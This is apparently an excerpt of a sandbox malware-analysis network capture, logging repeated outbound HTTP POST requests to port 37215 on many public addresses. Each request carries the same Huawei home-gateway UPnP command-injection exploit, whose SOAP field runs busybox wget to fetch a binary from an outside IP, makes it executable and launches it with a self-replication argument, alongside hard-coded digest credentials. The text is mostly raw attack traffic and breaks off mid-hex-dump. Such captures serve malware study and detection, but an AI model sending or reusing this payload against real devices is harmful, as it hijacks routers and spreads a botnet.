                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  907192.168.2.1344768150.13.127.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.444247007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  908192.168.2.135720420.191.68.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.444267988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  909192.168.2.135690441.44.55.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.444298029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  910192.168.2.136034041.136.154.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.444317102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  911192.168.2.135130041.16.99.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.444386959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  912192.168.2.1360560197.140.64.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.444433928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  913192.168.2.1337088157.223.39.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.444473982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  914192.168.2.135491041.41.211.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.444494963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  915192.168.2.1342452197.196.14.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.444510937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  916192.168.2.135287443.237.227.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.444724083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 